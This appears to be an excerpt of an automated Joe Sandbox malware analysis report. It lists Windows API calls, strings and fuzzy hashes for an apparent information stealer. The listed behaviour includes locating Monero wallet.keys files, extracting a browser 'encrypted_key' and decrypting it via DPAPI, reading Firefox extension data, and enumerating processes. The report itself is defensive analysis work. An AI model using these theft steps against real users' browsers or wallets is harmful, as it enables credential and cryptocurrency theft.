                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: @$v10$v20
                                    • API String ID: 2746078483-278772428
                                    • Opcode ID: a1a05d5cc813c481ab2338673367d31000f829717da8198ce291d55c9c6d60d2
                                    • Instruction ID: 3d94695ee7ae5f58444a4f01e1fba4a997eb1ced1fb51befa6e2adb1bf01af61
                                    • Opcode Fuzzy Hash: a1a05d5cc813c481ab2338673367d31000f829717da8198ce291d55c9c6d60d2
                                    • Instruction Fuzzy Hash: 12517074A40208EFDF18EFA4CD96FED77B5AF55304F808118F90A5B291EB706A45CB92
                                    APIs
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 0019A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0019A13C
                                      • Part of subcall function 0019A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0019A161
                                      • Part of subcall function 0019A110: LocalAlloc.KERNEL32(00000040,?), ref: 0019A181
                                      • Part of subcall function 0019A110: ReadFile.KERNEL32(000000FF,?,00000000,0019148F,00000000), ref: 0019A1AA
                                      • Part of subcall function 0019A110: LocalFree.KERNEL32(0019148F), ref: 0019A1E0
                                      • Part of subcall function 0019A110: CloseHandle.KERNEL32(000000FF), ref: 0019A1EA
                                      • Part of subcall function 001A8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001A8FE2
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                      • Part of subcall function 001AAC30: lstrcpy.KERNEL32(00000000,?), ref: 001AAC82
                                      • Part of subcall function 001AAC30: lstrcat.KERNEL32(00000000), ref: 001AAC92
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,001B1678,001B0D93), ref: 0019F64C
                                    • lstrlen.KERNEL32(00000000), ref: 0019F66B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: 73c60069c2fdaea5a95f44c88cf13c402d5e810d14e8e3da603b203927dc520a
                                    • Instruction ID: 95aaf3752b1e952452cccbde10d5bbb2e2ea2b20ebdfc26440b32c4133c55a13
                                    • Opcode Fuzzy Hash: 73c60069c2fdaea5a95f44c88cf13c402d5e810d14e8e3da603b203927dc520a
                                    • Instruction Fuzzy Hash: F451EF7AD10208ABCB44FBE4DDA6DFD7379AF65300F808568F51667191EF346A08CB62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: f8f5fb8b37e38ee6213a1b330811af0e50ef0c644a44bed56d48493195e93c90
                                    • Instruction ID: 8fcbdf72b6a37b628825643b1c9db3e7a0f3c85ff787302dc88795fb9fb8fbe8
                                    • Opcode Fuzzy Hash: f8f5fb8b37e38ee6213a1b330811af0e50ef0c644a44bed56d48493195e93c90
                                    • Instruction Fuzzy Hash: AC411C75E002099BCB04EFE4D855BEEB778AF59304F40851CF52677290EB74AA45CFA2
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 0019A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0019A13C
                                      • Part of subcall function 0019A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0019A161
                                      • Part of subcall function 0019A110: LocalAlloc.KERNEL32(00000040,?), ref: 0019A181
                                      • Part of subcall function 0019A110: ReadFile.KERNEL32(000000FF,?,00000000,0019148F,00000000), ref: 0019A1AA
                                      • Part of subcall function 0019A110: LocalFree.KERNEL32(0019148F), ref: 0019A1E0
                                      • Part of subcall function 0019A110: CloseHandle.KERNEL32(000000FF), ref: 0019A1EA
                                      • Part of subcall function 001A8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001A8FE2
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0019A489
                                      • Part of subcall function 0019A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00194F3E,00000000,00000000), ref: 0019A23F
                                      • Part of subcall function 0019A210: LocalAlloc.KERNEL32(00000040,?,?,?,00194F3E,00000000,?), ref: 0019A251
                                      • Part of subcall function 0019A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00194F3E,00000000,00000000), ref: 0019A27A
                                      • Part of subcall function 0019A210: LocalFree.KERNEL32(?,?,?,?,00194F3E,00000000,?), ref: 0019A28F
                                      • Part of subcall function 0019A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0019A2D4
                                      • Part of subcall function 0019A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0019A2F3
                                      • Part of subcall function 0019A2B0: LocalFree.KERNEL32(?), ref: 0019A323
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 27d1b811f52316cd7fe8f1dfe9797c2721b16e13ecc913db281916ce9ee1a664
                                    • Instruction ID: 1a36432a67f84f724de97996b5843fa853bbb2598037d3334cdae7a64daef28c
                                    • Opcode Fuzzy Hash: 27d1b811f52316cd7fe8f1dfe9797c2721b16e13ecc913db281916ce9ee1a664
                                    • Instruction Fuzzy Hash: 5A3154B6E00109ABDF04DFE4DC55AEFB7B8BF58304F844518E901A3241EB309E08CBA2
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001B05BF), ref: 001A885A
                                    • Process32First.KERNEL32(?,00000128), ref: 001A886E
                                    • Process32Next.KERNEL32(?,00000128), ref: 001A8883
                                      • Part of subcall function 001AACC0: lstrlen.KERNEL32(?,00E290E0,?,\Monero\wallet.keys,001B0E1A), ref: 001AACD5
                                      • Part of subcall function 001AACC0: lstrcpy.KERNEL32(00000000), ref: 001AAD14
                                      • Part of subcall function 001AACC0: lstrcat.KERNEL32(00000000,00000000), ref: 001AAD22
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • CloseHandle.KERNEL32(?), ref: 001A88F1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: fe1ad9825c6c7bae84974141e1a1c252e5c4e86f5f2c7e0d605c0b09a7b733a7
                                    • Instruction ID: f668be42ac62aed7e5bbb71277c5a7b9e24751ff7349d3bb135235f95ebb7999
                                    • Opcode Fuzzy Hash: fe1ad9825c6c7bae84974141e1a1c252e5c4e86f5f2c7e0d605c0b09a7b733a7
                                    • Instruction Fuzzy Hash: C0316B75901218ABCB64EF94CD51FEEB778EF56700F5041A9F10AA22A0EF306A44CFA1
                                    APIs
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0020FE13
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0020FE2C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Similarity
                                    • API ID: Value___vcrt_
                                    • String ID:
                                    • API String ID: 1426506684-0
                                    • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction ID: a24a7510afb250591cd9479774e24f1fe5858a73b493f1a5ee0ee570056c8959
                                    • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                    • Instruction Fuzzy Hash: B7012432569722EEF7742A749DC99A73684EB157B07304339F712805F3EFA14CB19540
                                    APIs
                                    • CreateFileA.KERNEL32(001A3D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,001A3D3E,?), ref: 001A948C
                                    • GetFileSizeEx.KERNEL32(000000FF,001A3D3E), ref: 001A94A9
                                    • CloseHandle.KERNEL32(000000FF), ref: 001A94B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: 3f2532baf05e4b7618e5935238d553e3be5b60cec3a63832e74bfa62b4a69a6f
                                    • Instruction ID: a6a59a7dd2daa86deff8f2827517f62509069cb8b3abc04cf920b8d6944e781b
                                    • Opcode Fuzzy Hash: 3f2532baf05e4b7618e5935238d553e3be5b60cec3a63832e74bfa62b4a69a6f
                                    • Instruction Fuzzy Hash: FBF0AF38E04208BBDB10DFB0EC48F9E77B9AB49314F10C264FA11A7280EBB096418B84
                                    APIs
                                    • __getptd.LIBCMT ref: 001ACA7E
                                      • Part of subcall function 001AC2A0: __amsg_exit.LIBCMT ref: 001AC2B0
                                    • __getptd.LIBCMT ref: 001ACA95
                                    • __amsg_exit.LIBCMT ref: 001ACAA3
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 001ACAC7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: e8976f1c3bfe9063183b6551b45ed454729651119d8dffecd42ed95e9a1613ca
                                    • Instruction ID: a93c3ebe30bb9dd6fff3ab73c07debeda30fb7f64eec6c22bea763fde59840a4
                                    • Opcode Fuzzy Hash: e8976f1c3bfe9063183b6551b45ed454729651119d8dffecd42ed95e9a1613ca
                                    • Instruction Fuzzy Hash: EDF0B43A9487189BD721FBB898437AE33A0AF52720F11414BF404A72D3EB645D808BD5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Similarity
                                    • API ID: Catch
                                    • String ID: MOC$RCC
                                    • API String ID: 78271584-2084237596
                                    • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction ID: 4f1c64fbd3be18443eab0869f44d4dcead4d30cb707d8dba2c194ec66c44f004
                                    • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                    • Instruction Fuzzy Hash: E341797191020AAFCF15DF98DC81AEEBBB6FF58300F188099F90466251D37599E0DF50
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: T8!
                                    • API String ID: 0-3473077211
                                    • Opcode ID: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                    • Instruction ID: 66c51119f2b74b7755afc89d8ab031b2ebad5dfcd8e54b7e827bf84e25a0b0ca
                                    • Opcode Fuzzy Hash: ebee7b7bad02afd5c38f62567c68525325c0f01fa4448d3b7adcdae8bc16ad3d
                                    • Instruction Fuzzy Hash: 342192F1620216BF9B10EF61D8808FAB7EAAF243647104568F91597190D770EEF18B90
                                    APIs
                                      • Part of subcall function 001A8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001A8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A51CA
                                    • lstrcat.KERNEL32(?,001B1058), ref: 001A51E7
                                    • lstrcat.KERNEL32(?,00E28FD0), ref: 001A51FB
                                    • lstrcat.KERNEL32(?,001B105C), ref: 001A520D
                                      • Part of subcall function 001A4B60: wsprintfA.USER32 ref: 001A4B7C
                                      • Part of subcall function 001A4B60: FindFirstFileA.KERNEL32(?,?), ref: 001A4B93
                                      • Part of subcall function 001A4B60: StrCmpCA.SHLWAPI(?,001B0FC4), ref: 001A4BC1
                                      • Part of subcall function 001A4B60: StrCmpCA.SHLWAPI(?,001B0FC8), ref: 001A4BD7
                                      • Part of subcall function 001A4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 001A4DCD
                                      • Part of subcall function 001A4B60: FindClose.KERNEL32(000000FF), ref: 001A4DE2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                    • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: 2db4695aa4388d0fd2800b670f1b811f608ad9eb84af60de5e89ee49dd7206a7
                                    • Instruction ID: b6de1b56a4d03df6f35f699d12f829ca8e2921b4f024e1027275725d005e844e
                                    • Opcode Fuzzy Hash: 2db4695aa4388d0fd2800b670f1b811f608ad9eb84af60de5e89ee49dd7206a7
                                    • Instruction Fuzzy Hash: 8A21DDBA900208B7DB14F770EC52EED733C9BA5300F414598F55596191FFB096C88BA6